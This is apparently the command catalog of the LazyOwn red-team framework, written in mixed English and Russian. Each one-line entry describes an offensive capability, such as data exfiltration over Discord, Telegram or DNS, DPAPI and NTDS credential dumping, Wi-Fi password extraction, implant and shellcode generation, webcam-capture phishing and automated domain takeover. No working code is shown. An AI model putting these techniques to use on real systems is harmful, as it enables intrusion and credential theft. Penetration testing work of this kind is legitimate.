bloodyADPhase: латеральное перемещение | Source: cli/commands/lateral_migrated.py
Выполняет команду bloodyAD.py для конкретного пользователя или для всех пользователей из файла users.txt.
chiselPhase: латеральное перемещение | Source: cli/commands/lateral.py
Запуск chisel для быстрого туннелирования.
dcomexecPhase: латеральное перемещение | Source: cli/commands/lateral_migrated.py
Выполняет инструмент Impacket dcomexec для запуска команд на удалённой системе с помощью DCOM.
dominionPhase: латеральное перемещение | Source: cli/commands/lateral_migrated.py
Выполняет полностью автоматический захват домена Active Directory.
getTGTPhase: латеральное перемещение | Source: cli/commands/lateral_migrated.py
Запрашивает билет Ticket Granting Ticket (TGT) с помощью инструмента Impacket с предоставленными учётными данными.
gospherusPhase: латеральное перемещение | Source: cli/commands/lateral_migrated.py
Команда gospherus: клонирует и использует инструмент Gopherus для генерации полезных нагрузок gopher для различных сервисов.
id_rsaPhase: латеральное перемещение | Source: cli/commands/lateral_migrated.py
Создаёт файл закрытого SSH-ключа и подключается к удалённому хосту по SSH.
lateral_mov_linPhase: латеральное перемещение | Source: cli/commands/lateral_migrated.py
Выполняет латеральное перемещение, загружая и устанавливая LazyOwn на удалённую Linux-машину.
ligoloPhase: латеральное перемещение | Source: cli/commands/lateral.py
Запуск Ligolo-ng для продвинутого пивотинга.
mssqlcliPhase: латеральное перемещение | Source: cli/commands/lateral_migrated.py
Пытается подключиться к серверу MSSQL с помощью инструмента mssqlclient.py с аутентификацией Windows.
ncPhase: латеральное перемещение | Source: cli/commands/lateral.py
Прослушивание или подключение через Netcat.
ngrokPhase: латеральное перемещение | Source: cli/commands/lateral.py
Запуск туннеля ngrok.
penelopePhase: латеральное перемещение | Source: cli/commands/lateral_migrated.py
Команда penelope: устанавливает и запускает Penelope для обработки обратных и привязанных оболочек.
regeorgPhase: латеральное перемещение | Source: cli/commands/lateral_migrated.py
Выполняет инструмент reGeorg для туннелирования HTTP(S) через SOCKS-прокси.
rncPhase: латеральное перемещение | Source: cli/commands/lateral_migrated.py
Запускает nc с rlwrap на указанном порту для прослушивания.
set_proxychainsPhase: латеральное перемещение | Source: cli/commands/lateral.py
Настраивает proxychains для текущей сессии.
shadowsocksPhase: латеральное перемещение | Source: cli/commands/lateral_migrated.py
Выполните инструмент Shadowsocks для создания защищённого туннеля для сетевого трафика.
socatФаза: латеральное перемещение | Источник: cli/commands/lateral.py
Запуск socat для проброса портов.
sshФаза: латеральное перемещение | Источник: cli/commands/lateral.py
Подключение по SSH к удалённому хосту (нестандартный порт).
sshdФаза: латеральное перемещение | Источник: cli/commands/lateral_migrated.py
Запускает службу SSH и отображает её статус.
stormbreakerФаза: латеральное перемещение | Источник: cli/commands/lateral_migrated.py
Команда stormbreaker: автоматизирует установку и использование Storm-Breaker для выполнения различных сетевых атак.
targetedKerberoasФаза: латеральное перемещение | Источник: cli/commands/lateral_migrated.py
Выполняет инструмент targetedKerberoast для извлечения билетов службы Kerberos.
tordФаза: латеральное перемещение | Источник: cli/commands/lateral_migrated.py
Выполняет скрипт tor.sh с указанным портом или по умолчанию использует порт 80, если порт не указан.
upload_c2Фаза: латеральное перемещение | Источник: cli/commands/lateral_migrated.py
Команда upload в клиенте с использованием C2 для загрузки файла.
vpnФаза: латеральное перемещение | Источник: cli/commands/lateral_migrated.py
Подключение к VPN путём выбора из доступных файлов .ovpn.
wifipassФаза: латеральное перемещение | Источник: cli/commands/lateral_migrated.py
Эта функция генерирует PowerShell-скрипт, который извлекает сохранённые пароли Wi-Fi в системе Windows.
wmiexecФаза: латеральное перемещение | Источник: cli/commands/lateral.py
Выполнение команд через WMI.
wmiexecproФаза: латеральное перемещение | Источник: cli/commands/lateral_migrated.py
Выполняет wmiexec-pro с различными параметрами для операций WMI.
adgetpassФаза: экфильтрация | Источник: cli/commands/exfiltration.py
Генерирует PowerShell-скрипт для извлечения учётных данных Azure AD Connect.
decryptФаза: экфильтрация | Источник: cli/commands/exfiltration.py
Расшифровывает файл, зашифрованный XOR, с использованием соответствующего ключа.
dns_beaconФаза: экфильтрация | Источник: cli/commands/dns_exfil.py
Запускает DNS-туннельный маяк.
dns_beacon_statusФаза: экфильтрация | Источник: cli/commands/dns_exfil.py
Показывает статус всех DNS-маяков.
dns_exfil_listenФаза: экфильтрация | Источник: cli/commands/dns_exfil.py
Запускает DNS-слушатель для экфильтрации на UDP-порту 53.
download_c2Фаза: экфильтрация | Источник: cli/commands/exfiltration.py
Загружает файл из C2-импланта через команду upload.
dpapi_blobФаза: экфильтрация | Источник: cli/commands/dpapi.py
Расшифровывает DPAPI-блоб в автономном режиме.
dpapi_harvestФаза: экфильтрация | Источник: cli/commands/dpapi.py
Собирает все учётные данные, защищённые DPAPI, с локальной машины.
dpapi_masterkeysФаза: экфильтрация | Источник: cli/commands/dpapi.py
Перечисляет и извлекает мастер-ключи DPAPI.
dplootФаза: экфильтрация | Источник: cli/commands/exfiltration.py
Запускает dploot для извлечения секретов, защищённых DPAPI.
encryptФаза: экфильтрация | Источник: cli/commands/exfiltration.py
Шифрует файл с помощью XOR, используя ключ, предоставленный вызывающим кодом.
evidenceФаза: экфильтрация | Источник: cli/commands/exfiltration.py
Кодирует дерево sessions/ в видеофайл или декодирует его обратно.
evilwinrmФаза: экфильтрация | Источник: cli/commands/exfiltration.py
Управляет Evil-WinRM через аутентификацию по паролю, хешу или только Kerberos.
exfil_autoФаза: экфильтрация | Источник: cli/commands/exfiltration.py
Автоматически определяет флаги и чувствительные файлы, затем выполняет экфильтрацию.
exfil_discordФаза: экфильтрация | Источник: cli/commands/exfiltration.py
Экфильтрует файл через вебхук Discord.
exfil_dnsФаза: экфильтрация | Источник: cli/commands/exfiltration.py
Экфильтрует данные через DNS-туннелирование.
exfil_gcsФаза: экфильтрация | Источник: cli/commands/exfiltration.py
Загружает файл в Google Cloud Storage.
exfil_httpФаза: экфильтрация | Источник: cli/commands/exfiltration.py
Экфильтрует файл через HTTP POST на контролируемый сервер.
exfil_s3Фаза: экфильтрация | Источник: cli/commands/exfiltration.py
Загружает файл в бакет AWS S3.
exfil_start_serverФаза: экфильтрация | Источник: cli/commands/dns_exfil.py
Запускает все необходимые слушатели для экфильтрации.
exfil_telegramФаза: экфильтрация | Источник: cli/commands/exfiltration.py
Экфильтрует файл через Telegram Bot API.
getadusersФаза: эксфильтрация | Источник: cli/commands/exfiltration.py
Запустите impacket-GetADUsers для перечисления учетных записей AD на контроллере домена.
getnthash_pyФаза: эксфильтрация | Источник: cli/commands/exfiltration.py
Восстановите NT-хэш из Kerberos U2U TGS с помощью PKINITtools.
getuserspnsФаза: эксфильтрация | Источник: cli/commands/exfiltration.py
Запустите impacket-GetUserSPNs для запроса сервисных билетов, пригодных для roasting.
gitdumperФаза: эксфильтрация | Источник: cli/commands/exfiltration.py
Установите git-dumper, если он отсутствует, и вытяните удаленное дерево .git.
gmsadumperФаза: эксфильтрация | Источник: cli/commands/exfiltration.py
Запустите gMSADumper для чтения blob-объектов паролей gMSA, видимых пользователю.
http_exfil_serverФаза: эксфильтрация | Источник: cli/commands/dns_exfil.py
Запустите минимальный HTTP-приемник для эксфильтрации данных.
reg_pyФаза: эксфильтрация | Источник: cli/commands/exfiltration.py
Запросите удаленный раздел реестра с помощью impacket-reg.py при аутентификации по хэшу.
rsyncФаза: эксфильтрация | Источник: cli/commands/exfiltration.py
Отправьте дерево sessions/ на rhost по SCP с использованием sshpass.
samdump2Фаза: эксфильтрация | Источник: cli/commands/exfiltration.py
Запустите samdump2 для файлов sessions/SYSTEM и sessions/SAM.
secretsdumpФаза: эксфильтрация | Источник: cli/commands/exfiltration.py
Запустите impacket-secretsdump для извлечения SAM, учетных данных или NTDS.
smb_exfilФаза: эксфильтрация | Источник: cli/commands/dns_exfil.py
Эксфильтрируйте файлы в SMB-ресурс на машине атакующего.
stageФаза: эксфильтрация | Источник: cli/commands/exfiltration.py
Подготовьте данные для эксфильтрации: сжатие, шифрование и разделение.
unzipФаза: эксфильтрация | Источник: cli/commands/exfiltration.py
Извлеките zip-архив, расположенный в sessions/.
upload_gofileФаза: эксфильтрация | Источник: cli/commands/exfiltration.py
Загрузите файл из sessions/ на Gofile через его HTTP API.
apt_playbookФаза: C2 | Источник: cli/commands/command_and_control_migrated.py
Вывод списка, проверка и запуск плейбуков APT на основе публичных отчетов об угрозах.
atomic_agentФаза: C2 | Источник: cli/commands/command_and_control_migrated.py
Генерация и синхронизация скриптов атомарных агентов.
atomic_genФаза: C2 | Источник: cli/commands/command_and_control_migrated.py
Генерация тестовых и очищающих скриптов для заданного идентификатора техники Atomic Red Team.
atomic_testsФаза: C2 | Источник: cli/commands/command_and_control_migrated.py
Выполнение тестов Atomic Red Team на основе выбранной пользователем платформы и теста.
attack_planФаза: C2 | Источник: cli/commands/command_and_control_migrated.py
Выполнение многошагового плана симуляции APT на основе идентификаторов тестов Atomic Red Team.
automsfФаза: C2 | Источник: cli/commands/command_and_control_migrated.py
Попытка проверить уязвимость с помощью модуля, переданного в качестве аргумента lazyown, например automsf exploit/windows/iis/iis_webdav_upload_asp, для использования в Metasploit.
c2Фаза: C2 | Источник: cli/commands/command_and_control_migrated.py
Управление настройкой C2-сервера и компиляцией агента.
c2_beacon_cmdФаза: C2 | Источник: cli/commands/command_and_control.py
Постановка команды в очередь для выполнения на подключенном beacon.
c2_beaconsФаза: C2 | Источник: cli/commands/command_and_control.py
Список всех активных сессий beacon с их временными метками последнего появления.
c2_implantФаза: C2 | Источник: cli/commands/command_and_control.py
Генерация скомпилированного импланта для целевой платформы.
c2_keygenФаза: C2 | Источник: cli/commands/command_and_control.py
Генерация нового ключа AES-256 для шифрования beacon.
c2_quickstartФаза: C2 | Источник: cli/commands/command_and_control.py
Быстрая настройка C2: генерация ключа, подготовка каталога импланта, вывод команд beacon.
c2_statusФаза: C2 | Источник: cli/commands/command_and_control.py
Показать сводный статус C2: слушатели, beacon, импланты и сессии.
calderaФаза: C2 | Источник: cli/commands/command_and_control_migrated.py
Установка и запуск сервера Caldera.
caldera_exportФаза: C2 | Источник: cli/commands/command_and_control_migrated.py
Экспорт плейбука LazyOwn в YAML-файл способности CALDERA.
caldera_importФаза: C2 | Источник: cli/commands/command_and_control_migrated.py
Импорт способностей CALDERA в LazyOwn. Импортируйте возможности CALDERA в плейбуки LazyOwn.
duckysparkФаза: c2 | Источник: cli/commands/command_and_control_migrated.py
duckyspark Компилирует и загружает скетч .ino на устройство Digispark с помощью Arduino CLI и Micronucleus.
emp3r0rФаза: c2 | Источник: cli/commands/command_and_control_migrated.py
Команда emp3r0r загружает и настраивает сервер Emperor для локальной эксплуатации.
empireФаза: c2 | Источник: cli/commands/command_and_control_migrated.py
Генерирует полезные нагрузки с помощью PowerShell Empire с различными параметрами.
generate_playbookФаза: c2 | Источник: cli/commands/command_and_control_migrated.py
Генерирует плейбук, который интегрирует тесты Atomic Red Team и техники MITRE ATT&CK.
iis_webdav_upload_aspФаза: c2 | Источник: cli/commands/command_and_control_migrated.py
(CVE-2017-7269). Уязвимость с использованием модуля iis_webdav_upload_asp из Metasploit.
listenerФаза: c2 | Источник: cli/commands/command_and_control_migrated.py
Управление C2-слушателями: список, добавление, запуск, остановка, удаление.
mitre_testФаза: c2 | Источник: cli/commands/command_and_control_migrated.py
Взаимодействует с фреймворком MITRE ATT&CK, используя формат STIX 2.0.
msfФаза: c2 | Источник: cli/commands/command_and_control_migrated.py
Автоматизирует различные задачи Metasploit, включая сканирование на уязвимости, настройку обратных оболочек и создание полезных нагрузок.
msfrpcФаза: c2 | Источник: cli/commands/command_and_control_migrated.py
Подключается к демону msfrpcd и позволяет удаленно управлять Metasploit.
my_playbookФаза: c2 | Источник: cli/commands/command_and_control_migrated.py
Генерирует плейбук из вашей пользовательской базы техник.
sandboxФаза: c2 | Источник: cli/commands/command_and_control_migrated.py
Переключение или запрос режима песочницы Docker.
sliver_serverФаза: c2 | Источник: cli/commands/command_and_control_migrated.py
Запускает сервер Sliver и генерирует файл конфигурации клиента для подключения клиентов.
aproposФаза: report | Источник: cli/commands/report_migrated.py
Поиск команд, соответствующих заданному параметру, в интерфейсе cmd и, при необходимости, расширение поиска с помощью системной команды apropos.
bannersФаза: report | Источник: cli/commands/report.py
Управление пользовательскими баннерами для фреймворка.
c2asmФаза: report | Источник: cli/commands/report_migrated.py
Отображение кода C и ASM бок о бок в интерфейсе на основе curses.
camphishФаза: report | Источник: cli/commands/report_migrated.py
Выполняет инструмент camphish для захвата изображений с фронтальной камеры телефона цели или веб-камеры ПК, просто отправив ссылку.
create_session_jsonФаза: report | Источник: cli/commands/report.py
Создать файл отчета сеанса в формате JSON.
createjsonmachineФаза: report | Источник: cli/commands/report_migrated.py
Создать новый файл полезной нагрузки JSON на основе шаблона, предоставленного в payload.json.
createjsonmachine_batchФаза: report | Источник: cli/commands/report_migrated.py
Создать несколько файлов полезной нагрузки JSON на основе входного CSV-файла от HackerOne.
createtargetsФаза: report | Источник: cli/commands/report.py
Создать файл целей из сканирования nmap.
download_malwarebazarФаза: report | Источник: cli/commands/report_migrated.py
Скачать образец вредоносного ПО из MalwareBazaar, используя его SHA256-хеш.
extract_portsФаза: report | Источник: cli/commands/report_migrated.py
Извлекает информацию об открытых портах и IP-адресах из указанного файла.
eyewitnessФаза: report | Источник: cli/commands/report.py
Запустить EyeWitness для захвата веб-снимков экрана.
eyewitness_pyФаза: report | Источник: cli/commands/report_migrated.py
Автоматизирует установку и выполнение EyeWitness без необходимости ввода пользователя.
gen_reportФаза: report | Источник: cli/commands/report_enhanced.py
Создание улучшенных профессиональных отчетов о тестировании на проникновение.
get_avaible_actionsФаза: report | Источник: cli/commands/report_migrated.py
Получить список поддерживаемых действий.
gowitnessФаза: report | Источник: cli/commands/report.py
Запустить gowitness для захвата веб-снимков экрана.
gptФаза: report | Источник: cli/commands/report.py
Запрос к GPT/Groq AI для анализа и формирования отчётов.
img2vidФаза: отчёт | Источник: cli/commands/report_migrated.py
Создаёт MP4-видео из PNG-изображений, найденных в каталоге sessions/captured_images.
lazyreportФаза: отчёт | Источник: cli/commands/report_migrated.py
Формирует профессиональный отчёт о результатах red team на основе данных сеанса.
malwarebazarФаза: отчёт | Источник: cli/commands/report.py
Поиск образцов вредоносного ПО в Malware Bazaar.
morseФаза: отчёт | Источник: cli/commands/report_migrated.py
Интерактивный преобразователь кода Морзе.
name_the_hashФаза: отчёт | Источник: cli/commands/report_migrated.py
Определяет тип хеша с помощью nth после получения его через get_hash().
nmapscripthelpФаза: отчёт | Источник: cli/commands/report_migrated.py
Помогает найти и отобразить информацию о скриптах Nmap.
process_scansФаза: отчёт | Источник: cli/commands/report_migrated.py
Обрабатывает CSV-файлы с результатами сканирования и данными об уязвимостях для создания базы данных в формате, подобном Shodan.
pth_netФаза: отчёт | Источник: cli/commands/report_migrated.py
Выполняет инструмент Pass-the-Hash (PTH) Net для смены пароля учётной записи Active Directory.
pupФаза: отчёт | Источник: cli/commands/report_migrated.py
Обрабатывает HTML-содержимое указанного URL с помощью утилиты pup и стандартного CSS-селектора.
vulnsФаза: отчёт | Источник: cli/commands/report.py
Отображение или управление уязвимостями.
EOFФаза: разное | Источник: cli/commands/misc_migrated.py
Обрабатывает условие конца файла (EOF).
acknowledgearpФаза: разное | Источник: cli/commands/misc_migrated.py
Настраивает систему на подтверждение ARP-запросов путём установки параметра ядра.
acknowledgeicmpФаза: разное | Источник: cli/commands/misc_migrated.py
Настраивает систему на ответ на ICMP echo-запросы путём установки параметра ядра.
addaliasФаза: разное | Источник: cli/commands/misc_migrated.py
Добавляет новый алиас с поддержкой плейсхолдеров, таких как {rhost}, {lhost}, {lport} и т.д.
addhostsФаза: разное | Источник: cli/commands/misc_migrated.py
Добавляет запись в файл /etc/hosts, сопоставляя IP-адрес с доменным именем.
aliassФаза: разное | Источник: cli/commands/misc_migrated.py
Выводит все настроенные алиасы и связанные с ними команды.
assignФаза: разное | Источник: cli/commands/misc_migrated.py
Присваивает значение параметру, сохраняет его в payload.json и обновляет алиасы.
backФаза: разное | Источник: cli/commands/module_manager.py
Покидает контекст текущего модуля.
bannerФаза: разное | Источник: cli/commands/misc_migrated.py
Показать баннер.
base64decodeФаза: разное | Источник: cli/commands/misc_migrated.py
Декодирует строку, закодированную в Base64.
base64encodeФаза: разное | Источник: cli/commands/misc_migrated.py
Кодирует заданную строку в формат Base64.
browseФаза: разное | Источник: cli/commands/misc_migrated.py
Открыть TUI-браузер sessions/.
campaignФаза: разное | Источник: cli/commands/campaign.py
Экспорт или импорт всей кампании в виде переносимого пакета.
catalogФаза: разное | Источник: cli/commands/catalog.py
Просмотр каталога команд.
chainmodeФаза: разное | Источник: cli/commands/misc_migrated.py
Переключение интерактивного режима цепочки kill-chain после каждой команды.
check_updateФаза: разное | Источник: cli/commands/misc_migrated.py
Проверяет наличие обновлений, сравнивая локальную версию с удалённой.
cleanФаза: разное | Источник: cli/commands/misc_migrated.py
Удаляет файлы и каталоги в директории sessions, исключая указанные файлы и каталоги.
clockФаза: разное | Источник: cli/commands/misc_migrated.py
Отображает текущие дату и время, а также выполняет пользовательский shell-скрипт.
clone_siteФаза: разное | Источник: cli/commands/misc_migrated.py
Клонирует веб-сайт и размещает файлы в sessions/{url_cloned}.
collab_joinФаза: разное | Источник: cli/commands/misc_migrated.py
Выводит URL для присоединения к совместной работе нескольких операторов и SSE-конечную точку.
config_bannerФаза: разное | Источник: cli/commands/misc_migrated.py
Настраивает баннер конфигурации. Откройте мастер в стиле Powerlevel10k для переключения сегментов приглашения.
cred_mark_failedФаза: разное | Источник: cli/commands/automation.py
Пометить учётные данные как неудачные для хоста.
cred_reuseФаза: разное | Источник: cli/commands/automation.py
Проанализировать захваченные учётные данные и предложить цели для распыления (spray).
cronФаза: разное | Источник: cli/commands/misc_migrated.py
Планирует выполнение команды в указанное время.
ctxФаза: разное | Источник: cli/commands/misc_migrated.py
Вывести однострочный контекст оператора: rhost, lhost, domain, phase, os, creds.
daemon_approveФаза: разное | Источник: cli/commands/misc_migrated.py
Одобрить или отклонить текущее ожидающее действие демона.
daemon_focusФаза: разное | Источник: cli/commands/misc_migrated.py
Ограничить автономный демон набором целевых объектов.
daemon_modeФаза: разное | Источник: cli/commands/misc_migrated.py
Переключить автономный демон между режимами auto, approval и paused.
daemon_pauseФаза: разное | Источник: cli/commands/misc_migrated.py
Приостановить автономный демон перед следующим шагом.
daemon_resumeФаза: разное | Источник: cli/commands/misc_migrated.py
Возобновить работу автономного демона (переключить режим на auto).
daemon_vetoФаза: разное | Источник: cli/commands/misc_migrated.py
Добавить или очистить запрещённые первые токены команд для автономного демона.
dashboardФаза: разное | Источник: cli/commands/misc_migrated.py
Запустить полноэкранную панель оператора LazyOwn (Textual TUI).
db_credsФаза: разное | Источник: cli/commands/database.py
Список или добавление учётных данных.
db_exportФаза: разное | Источник: cli/commands/database.py
Экспорт таблицы базы данных в CSV.
db_hostsФаза: разное | Источник: cli/commands/database.py
Список или добавление хостов в активной рабочей области.
db_importФаза: разное | Источник: cli/commands/database.py
Импорт результатов сканирования в базу данных.
db_initФаза: разное | Источник: cli/commands/database.py
Инициализация базы данных (создаёт схему, если она не существует).
db_lootФаза: разное | Источник: cli/commands/database.py
Список или добавление элементов добычи (loot).
db_notesФаза: разное | Источник: cli/commands/database.py
Список или добавление заметок.
db_servicesФаза: разное | Источник: cli/commands/database.py
Список всех сервисов в активной рабочей области.
db_statusФаза: разное | Источник: cli/commands/database.py
Показать количество сущностей для активной рабочей области.
db_vulnsФаза: разное | Источник: cli/commands/database.py
Список или добавление уязвимостей.
db_workspaceФаза: разное | Источник: cli/commands/database.py
Управление рабочими областями (список, создание, переключение, удаление).
decodeФаза: разное | Источник: cli/commands/misc_migrated.py
Декодировать строку, используя указанное значение сдвига и ключ подстановки.
doctorФаза: разное | Источник: cli/commands/misc_migrated.py
Предварительная проверка работоспособности окружения — убедиться, что установка готова.
download_resourcesФаза: разное | Источник: cli/commands/misc_migrated.py
Загружает ресурсы в каталог sessions.
encodeФаза: разное | Источник: cli/commands/misc_migrated.py
Кодирует строку, используя указанное значение сдвига и ключ подстановки.
encoderpayloadФаза: разное | Источник: cli/commands/misc_migrated.py
Применяет различные обфускации к заданной строке командной строки для создания нескольких обфусцированных версий.
encodewinbase64Фаза: разное | Источник: cli/commands/misc_migrated.py
Кодирует заданную полезную нагрузку в строку Base64, подходящую для выполнения в Windows PowerShell.
engageФаза: разное | Источник: cli/commands/misc_migrated.py
Провести одну цель через полную цепочку атак одной командой.
exitФаза: разное | Источник: cli/commands/misc_migrated.py
Выход из интерфейса командной строки.
exploreФаза: разное | Источник: cli/commands/misc_migrated.py
Показать покрытие исследования и предложения по аддонам/инструментам для каждого сервиса.
fixelФаза: разное | Источник: cli/commands/misc_migrated.py
Исправляет права доступа к файлам и окончания строк в каталогах проекта.
fixpermФаза: разное | Источник: cli/commands/misc_migrated.py
Исправить права доступа для shell-скриптов LazyOwn.
gencertФаза: misc | Источник: cli/commands/misc_migrated.py
Генерирует центр сертификации (CA), клиентский сертификат и клиентский ключ.
generateФаза: misc | Источник: cli/commands/payload_generation.py
Сгенерировать полезную нагрузку (payload).
getseclistФаза: misc | Источник: cli/commands/misc_migrated.py
Получить словарь SecLists с GitHub.
god_nodesФаза: misc | Источник: cli/commands/misc_migrated.py
Показать наиболее связанные узлы («божественные узлы») из графа.
graphФаза: misc | Источник: cli/commands/misc_migrated.py
Генерирует граф из JSON-файлов полезной нагрузки, содержащих URL, RHOST и RPORT.
graph_overlayФаза: misc | Источник: cli/commands/misc_migrated.py
Открыть наложение графа поверх графа знаний graphify.
graph_searchФаза: misc | Источник: cli/commands/misc_migrated.py
Нечёткий поиск узлов по метке в графе знаний graphify.
gymФаза: misc | Источник: cli/commands/redteam_gym.py
Red Team Gym — игровое обучение пентесту с рейтингом ELO.
hФаза: misc | Источник: cli/commands/misc_migrated.py
Открыть новое окно в сессии tmux с использованием LazyOwn RedTeam Framework.
hex_to_plaintextФаза: misc | Источник: cli/commands/misc_migrated.py
Преобразует шестнадцатеричные данные из файла в обычный текст.
hooksФаза: misc | Источник: cli/commands/automation.py
Управление условными хуками — список, включение, отключение, добавление, удаление правил.
hooks_addФаза: misc | Источник: cli/commands/automation.py
Добавить новое правило условного хука (JSON-строка).
hooks_enableФаза: misc | Источник: cli/commands/automation.py
Включить или отключить правило хука.
hooks_fireФаза: misc | Источник: cli/commands/automation.py
Вручную запустить событие хука для тестирования.
hooks_listФаза: misc | Источник: cli/commands/automation.py
Перечислить все правила условных хуков.
hooks_removeФаза: misc | Источник: cli/commands/automation.py
Удалить правило хука по имени.
huntФаза: misc | Источник: cli/commands/misc_migrated.py
Запустить автономную цепочку эксплуатации против цели.
ignorearpФаза: misc | Источник: cli/commands/misc_migrated.py
Настраивает систему игнорировать ARP-запросы путём установки параметра ядра.
ignoreicmpФаза: misc | Источник: cli/commands/misc_migrated.py
Настраивает систему игнорировать ICMP-запросы эхо-ответа путём установки параметра ядра.
ipФаза: misc | Источник: cli/commands/misc_migrated.py
Отображает IP-адреса сетевых интерфейсов и копирует IP-адрес из интерфейса tun0 в буфер обмена.
ip2asnФаза: misc | Источник: cli/commands/misc_migrated.py
Команда для получения ASN для заданного IP-адреса.
ip2hexФаза: misc | Источник: cli/commands/misc_migrated.py
Преобразовать IPv4-адрес в его шестнадцатеричное представление.
ippФаза: misc | Источник: cli/commands/misc_migrated.py
Отображает IP-адреса сетевых интерфейсов и выводит IP-адрес из интерфейса tun0.
karmaФаза: misc | Источник: cli/commands/misc_migrated.py
Показать рейтинг ELO, уровень кармы и прогресс исследования для этого оператора.
kickФаза: misc | Источник: cli/commands/misc_migrated.py
Обрабатывает процесс отправки поддельного ARP-пакета на указанный IP-адрес с заданным MAC-адресом.
killchainФаза: misc | Источник: cli/commands/misc_migrated.py
Показать общий прогресс цепочки атаки (kill-chain) и управлять автообновлением.
l00tФаза: misc | Источник: cli/commands/misc_migrated.py
Единая добыча: показать, искать, повторно использовать, строить граф и помечать учётные данные.
labФаза: misc | Источник: cli/commands/lab.py
Управлять локальными лабораториями для практики CTF.
lazyscriptФаза: misc | Источник: cli/commands/misc_migrated.py
Выполняет команды, определённые в файле lazyscript.
linksФаза: misc | Источник: cli/commands/misc_migrated.py
Отображает список полезных ссылок и позволяет пользователю выбрать и скопировать ссылку в буфер обмена.
listФаза: misc | Источник: cli/commands/misc_migrated.py
Перечисляет все доступные скрипты в каталоге модулей.
listaliasesФаза: misc | Источник: cli/commands/misc_migrated.py
Перечислить все доступные алиасы.
load_sessionPhase: misc | Source: cli/commands/misc_migrated.py
Загрузить сессию из файла sessionLazyOwn.json и отобразить состояние различных параметров.
lock_targetPhase: misc | Source: cli/commands/collaboration.py
Получить рекомендательную блокировку на цель, чтобы предотвратить конфликты инструментов.
loginPhase: misc | Source: cli/commands/cli_auth.py
Аутентификация через users.json (те же пользователи, что и в lazyc2.py).
logoutPhase: misc | Source: cli/commands/cli_auth.py
Выйти из системы текущего оператора CLI и очистить токен запоминания.
lolbas_listPhase: misc | Source: cli/commands/pwn.py
Перечислить доступные техники LOLBAS (Living Off The Land) из плагинов.
lootPhase: misc | Source: cli/commands/misc_migrated.py
Псевдоним для l00t — унифицированная добыча (показать/искать/использовать/граф/отметить).
makercPhase: misc | Source: cli/commands/resource_scripting.py
Записать команды сеанса в ресурсный скрипт.
marketplacePhase: misc | Source: cli/commands/marketplace.py
Найти и установить плагины, дополнения и инструменты сообщества.
marketplace_configPhase: misc | Source: cli/commands/marketplace.py
Интерактивный менеджер маркетплейса (curses TUI).
mkrcPhase: misc | Source: cli/commands/resource_scripting.py
Псевдоним для makerc — записать команды в скрипт.
msfshellcoderPhase: misc | Source: cli/commands/misc_migrated.py
Сгенерировать шеллкод в формате C с помощью msfvenom для пользовательской команды или полезной нагрузки reverse shell.
nanoPhase: misc | Source: cli/commands/misc_migrated.py
Открыть или создать файл с помощью строки в каталоге сессий для редактирования в nano.
neighborsPhase: misc | Source: cli/commands/misc_migrated.py
Показать соседей узла или команды из графа graphify.
newsPhase: misc | Source: cli/commands/misc_migrated.py
Показать Hacker News в терминале.
nextPhase: misc | Source: cli/commands/misc_migrated.py
Показать рекомендации по следующим шагам или выполнить активную авто-подсказку.
notePhase: misc | Source: cli/commands/misc_migrated.py
Захватить быструю заметку оператора, привязанную к текущей цели и фазе.
notifyPhase: misc | Source: cli/commands/misc_migrated.py
Команда для запуска уведомления в стиле toastr.
op_createPhase: misc | Source: cli/commands/caldera.py
Создать новую запланированную операцию.
op_listPhase: misc | Source: cli/commands/caldera.py
Перечислить все операции.
op_pausePhase: misc | Source: cli/commands/caldera.py
Приостановить выполняющуюся операцию.
op_planPhase: misc | Source: cli/commands/caldera.py
Заполнить шаги операции из playbook YAML или через MITRE derive.
op_reportPhase: misc | Source: cli/commands/caldera.py
Сгенерировать полный отчёт по операции.
op_resumePhase: misc | Source: cli/commands/caldera.py
Возобновить приостановленную операцию.
op_startPhase: misc | Source: cli/commands/caldera.py
Запустить (или возобновить) операцию.
op_statusPhase: misc | Source: cli/commands/caldera.py
Показать статус операции.
op_stopPhase: misc | Source: cli/commands/caldera.py
Остановить выполняющуюся операцию.
op_timelinePhase: misc | Source: cli/commands/caldera.py
Показать временную шкалу событий операции.
operator_createPhase: misc | Source: cli/commands/automation.py
Создать новый профиль оператора.
operator_deletePhase: misc | Source: cli/commands/automation.py
Удалить профиль оператора.
operator_loadPhase: misc | Source: cli/commands/automation.py
Загрузить эффективную конфигурацию для оператора (базовая линия команды + переопределения).
operatorsPhase: misc | Source: cli/commands/automation.py
Перечислить все профили операторов.
palettePhase: misc | Source: cli/commands/misc_migrated.py
Просмотреть каталог команд оператора, сгруппированных по фазе цепочки убийства.
palette_kPhase: misc | Source: cli/commands/misc_migrated.py
Открыть нечёткую накладную палитру команд Command-K.
payloadPhase: misc | Source: cli/commands/misc_migrated.py
Загрузить параметры из указанного файла payload JSON.
phasePhase: misc | Source: cli/commands/misc_migrated.py
Получить или установить текущую фазу килл-чейна.
pipelineФаза: misc | Источник: cli/commands/misc_migrated.py
Декларативный слой композиции: запуск YAML-конвейера команд LazyOwn.
pivotФаза: misc | Источник: cli/commands/misc_migrated.py
Записать новую обнаруженную цель для перехода или показать цепочку переходов.
planФаза: misc | Источник: cli/commands/caldera.py
Выбрать следующую наилучшую технику для выполнения для цели.
plan_applyФаза: misc | Источник: cli/commands/caldera.py
Запустить планировщик, затем автоматически создать и запустить операцию.
plan_detailФаза: misc | Источник: cli/commands/caldera.py
Показать полный ранжированный план (все кандидаты) для цели.
popФаза: misc | Источник: cli/commands/misc_migrated.py
Открыть центрированное всплывающее окно в текущей tmux-сессии для выполнения shell-команды.
prevФаза: misc | Источник: cli/commands/misc_migrated.py
Показать предварительные команды для глагола (стрелка prev в цепочке).
pwdФаза: misc | Источник: cli/commands/misc_migrated.py
Отображает текущую рабочую директорию и список файлов, а также копирует путь текущей директории в буфер обмена.
qaФаза: misc | Источник: cli/commands/misc_migrated.py
Быстро выйти из приложения без подтверждения.
recommend_nextФаза: misc | Источник: cli/commands/misc_migrated.py
Рекомендовать следующее действие через единый механизм рекомендаций.
registerФаза: misc | Источник: cli/commands/cli_auth.py
Зарегистрировать новую учётную запись оператора в users.json.
resourceФаза: misc | Источник: cli/commands/resource_scripting.py
Запустить расширенный ресурсный скрипт.
rhostФаза: misc | Источник: cli/commands/misc_migrated.py
Копирует удалённый хост (self.params['rhost']) в буфер обмена и обновляет приглашение командной строки.
rich_tuiФаза: misc | Источник: cli/commands/pwn.py
Запустить интерактивный TUI-дашборд на основе Rich.
rotФаза: misc | Источник: cli/commands/misc_migrated.py
Применить шифр подстановки ROT (вращение) к заданной строке.
rotfФаза: misc | Источник: cli/commands/misc_migrated.py
